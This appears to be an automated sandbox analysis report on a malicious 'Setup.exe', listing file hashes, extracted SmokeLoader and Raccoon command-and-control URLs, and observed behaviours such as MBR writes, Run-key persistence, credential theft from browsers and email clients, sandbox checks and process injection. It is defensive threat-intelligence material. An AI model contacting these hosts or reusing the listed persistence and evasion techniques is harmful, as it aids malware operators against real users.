Analysis
-
max time kernel
112s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
01-03-2021 05:53
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v20201028
General
-
Target
Setup.exe
-
Size
4.1MB
-
MD5
d9c8f4d5e5def9b419ee958b95295d67
-
SHA1
fe1e8744fac9c4ca1d6259b84bad88266e30d513
-
SHA256
42b3ce7cea9258cab25a9d6107e164be0e2ca268fe16fd35737359313b58b01e
-
SHA512
1cbdae7791e66e93fa2e961d8113d0e5aa06ef5001ba14573cfc51e4b72a206f9b24c02927e2bc8078e3e68adc682a642454d0585d56dbabe0a98b792c594e4b
Malware Config
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2212-234-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/2212-233-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/2212-236-0x0000000003900000-0x0000000004102000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1228-138-0x0000000004B50000-0x0000000004B7E000-memory.dmp family_redline behavioral2/memory/1228-141-0x0000000007140000-0x000000000716C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Nirsoft 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\1614581416292.exe Nirsoft C:\Users\Admin\AppData\Roaming\1614581416292.exe Nirsoft C:\Users\Admin\AppData\Roaming\1614581421558.exe Nirsoft C:\Users\Admin\AppData\Roaming\1614581421558.exe Nirsoft C:\Users\Admin\AppData\Roaming\1614581426933.exe Nirsoft C:\Users\Admin\AppData\Roaming\1614581426933.exe Nirsoft -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/6052-286-0x0000000003010000-0x0000000003101000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 35 IoCs
Processes:
26FF190E7AE0F7C7.exe26FF190E7AE0F7C7.exe1614581416292.exe1614581421558.exe1614581426933.exeThunderFW.exeMiniThunderPlatform.exe23E04C4F32EF2158.exe23E04C4F32EF2158.tmpseed.sfx.exeseed.exeA885.exeA885.exeB874.exeC3D0.exeupdatewin1.exeCA59.exeCEBF.exeupdatewin2.exeupdatewin.exeDB52.exeBenedetto.comBenedetto.comsjfmdcgk.exeE1AC.exeEB42.exeE1AC.exejfiag3g_gg.exeF18D.exeF873.exejfiag3g_gg.exe5.exeFC2E.exeFC2E.tmp48B.exepid process 3508 26FF190E7AE0F7C7.exe 1516 26FF190E7AE0F7C7.exe 2312 1614581416292.exe 3768 1614581421558.exe 1848 1614581426933.exe 1324 ThunderFW.exe 3488 MiniThunderPlatform.exe 3708 23E04C4F32EF2158.exe 2908 23E04C4F32EF2158.tmp 2728 seed.sfx.exe 1332 seed.exe 4748 A885.exe 4868 A885.exe 4892 B874.exe 4204 C3D0.exe 4212 updatewin1.exe 1228 CA59.exe 4760 CEBF.exe 4792 updatewin2.exe 5076 updatewin.exe 4572 DB52.exe 5476 Benedetto.com 5656 Benedetto.com 5980 sjfmdcgk.exe 6004 E1AC.exe 5328 EB42.exe 5312 E1AC.exe 5552 jfiag3g_gg.exe 5856 F18D.exe 2212 F873.exe 4228 jfiag3g_gg.exe 3492 5.exe 5436 FC2E.exe 5488 FC2E.tmp 5740 48B.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\gdiview.msi office_xlm_macros -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 21 IoCs
Processes:
MsiExec.exe26FF190E7AE0F7C7.exeMiniThunderPlatform.exeseed.exeC3D0.exeE1AC.exeFC2E.tmppid process 3764 MsiExec.exe 3508 26FF190E7AE0F7C7.exe 3508 26FF190E7AE0F7C7.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 3488 MiniThunderPlatform.exe 1332 seed.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 4204 C3D0.exe 5312 E1AC.exe 5488 FC2E.tmp -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
A885.exeEB42.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\5df7de7b-36f7-4e29-b452-12327328f339\\A885.exe\" --AutoStart" A885.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" EB42.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Setup.exe26FF190E7AE0F7C7.exe26FF190E7AE0F7C7.exeDB52.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DB52.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 78 api.2ip.ua 79 api.2ip.ua 82 api.2ip.ua 122 ip-api.com 177 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
26FF190E7AE0F7C7.exeMiniThunderPlatform.exeSetup.exe26FF190E7AE0F7C7.exedescription ioc process File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Setup.exepid process 812 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
26FF190E7AE0F7C7.exesjfmdcgk.exeE1AC.exedescription pid process target process PID 3508 set thread context of 1976 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 set thread context of 2344 3508 26FF190E7AE0F7C7.exe firefox.exe PID 3508 set thread context of 2196 3508 26FF190E7AE0F7C7.exe firefox.exe PID 5980 set thread context of 5236 5980 sjfmdcgk.exe svchost.exe PID 6004 set thread context of 5312 6004 E1AC.exe E1AC.exe -
Drops file in Program Files directory 36 IoCs
Processes:
23E04C4F32EF2158.tmpseed.sfx.exedescription ioc process File created C:\Program Files (x86)\DTS\images\is-RATDM.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-ARAES.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-F3TDD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-J71K1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-ONBEU.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-NJ77A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-MPISB.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-TMH1G.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-GNP3T.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-A75A9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-PD5SH.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259343875 seed.sfx.exe File created C:\Program Files (x86)\DTS\is-KL2BA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-IHOJA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-DK0SI.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-R862V.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-LGOPE.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\DTS\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-O0MS4.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-LE5D5.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-TU2T6.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-FMA3M.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File opened for modification C:\Program Files (x86)\DTS\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-0BS22.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-I03DR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-0KUU8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-QOOJA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-F332C.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-2OIJN.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\DTS\is-MQU4D.tmp 23E04C4F32EF2158.tmp -
Drops file in Windows directory 2 IoCs
Processes:
MicrosoftEdge.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5308 3492 WerFault.exe 5.exe 5592 3492 WerFault.exe 5.exe 5704 3492 WerFault.exe 5.exe 5816 3492 WerFault.exe 5.exe 5944 3492 WerFault.exe 5.exe 6076 3492 WerFault.exe 5.exe 4632 3492 WerFault.exe 5.exe 4492 3492 WerFault.exe 5.exe 5452 3492 WerFault.exe 5.exe 5428 3492 WerFault.exe 5.exe 5584 3492 WerFault.exe 5.exe 2308 3492 WerFault.exe 5.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
26FF190E7AE0F7C7.exe26FF190E7AE0F7C7.exeseed.exeE1AC.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E1AC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E1AC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E1AC.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 5300 timeout.exe 5404 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exeTASKKILL.exepid process 748 taskkill.exe 5612 TASKKILL.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = ac5ba63f81a2220524edb47d450dd49d084297dce82e72baa46d34fdc48d541d2ad0cd1b80cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691cd58748753ce4a8644490bdb57f21ee905e0ccdf1b554758df21d5904e0a56816d880487d3ae2a864419bdce0286682cd0934cec4e4241dd69f460a33ffa26e10edc70f3252a0f40948f48fb47520ee965e04c9f48d387287cc186270a4f93824dc80457c3ee1ac551dcdbd606d93dd220282a5c48d541de5ad743d73a2e6367b9ec60b440dd49d642df4bde02d1547e16d34fdc48e980fe7ad743d05fcac680adf81496a3cedad4a1fc585844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d042f955d24 svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000005069413dd2a24be4cec3fc52e5ffa9711073d0d28595823f2fbaebb177a861b663ca6bc64da03a6d61695e29882afd086f92b281eb570b958113ff4e8cbb1db8d72f5120458f79871b3da78df3cefc3b8946b857e65aea120faa07e84b18bc77eaba25f88e0e5f95235e4c209d8bc8d7ecafb7e8ff3e8b10c69d4344715d9137708a6dc973bff75b6aec97148501b6bf34ee0a9627a44748270e4b94be2b6e4639bf0cf4554173c4090759135bd008c24f21520e0a2a035fe51b8fd4052310e53779e71fee33e2af4dcf9e71339887008569ac173171f38273e6cbfe98e3f0acf9d77df12937d4d8c06469da78f97fe54de757ae9f192d10e68d5207110d879190fb3c0e13ec6ec68ae6314e519387a924b9a36efdc2c55041320fb10e3f1a7076044472d2f18dcff575cff16e061c6ef100bf549c0c114497f3742d821aa92d1f12db125ee8232be9319ad494f151df87dcb6c44398877a0cf244883a3ff163ce446ad44470f514ef3a298ca6f6106b496e41ec5a040aff744ef9efc34c27a0c3bc2fcec628e1fdc9b03098b8b4100c76d4476a69f11953df424e875a84e20340f24cc568d6 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" 